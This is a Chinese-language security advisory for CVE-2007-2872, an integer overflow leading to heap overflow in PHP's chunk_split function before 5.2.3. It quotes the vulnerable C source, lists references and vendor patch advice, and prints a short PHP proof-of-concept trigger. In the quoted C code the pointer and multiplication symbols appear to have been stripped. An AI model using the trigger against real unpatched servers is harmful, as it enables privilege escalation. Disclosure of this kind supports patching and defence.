受影响系统:
PHP PHP < 5.2.3
不受影响系统:
PHP PHP 5.2.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 24261
CVE(CAN) ID: CVE-2007-2872PHP是一种流行的WEB服务器端编程语言。PHP中的chunk_split函数在处理畸形参数时存在整数溢出漏洞,本地攻击者可能利用此漏洞提升自己的权限。PHP中chunk_split函数的1963行试图为函数结果分配充分的内存大小,但没有执行任何检查便使用了srclen和chunklen参数块。如果值的块和endlen大于65534字节的话,就会触发整数溢出,分配错误的内存大小,导致堆溢出。ext/standard/string.c:1953 static char PHP_chunk_split(char src,int srclen,char end,
int endlen,int chunklen,int destlen)
1954 {
1955 char dest;
1956 char p,q;
1957 int chunks; / complete chunks! /
1958 int restlen;
1959
1960 chunks = srclen / chunklen;
1961 restlen = srclen - chunks chunklen; / srclen % chunklen /
1962
1963 dest = safe_emalloc((srclen + (chunks + 1) endlen + 1),
sizeof(char),0);
1964
1965 for (p = src,q = dest; p < (src + srclen - chunklen + 1); ) {
1966 memcpy(q,p,chunklen);
1967 q += chunklen;
1968 memcpy(q,end,endlen);
1969 q += endlen;
1970 p += chunklen;
1971 }<来源:Gerhard Wagner链接:<A title=http://marc.info/?l=bugtraq&m=118071054000708&w=2 href="http://marc.info/?l=bugtraq&m=118071054000708&w=2" target=_blank>http://marc.info/?l=bugtraq&m=118071054000708&w=2
http://www.php.net/releases/5_2_3.php
http://secunia.com/advisories/25456/
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<?
$a=str_repeat("A",65535);
$b=1;
$c=str_repeat("A",65535);
chunk_split($a,$b,$c);
?>建议:
--------------------------------------------------------------------------------
厂商补丁:PHP
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.php.net/downloads.php#v5文章来自: 绿盟科技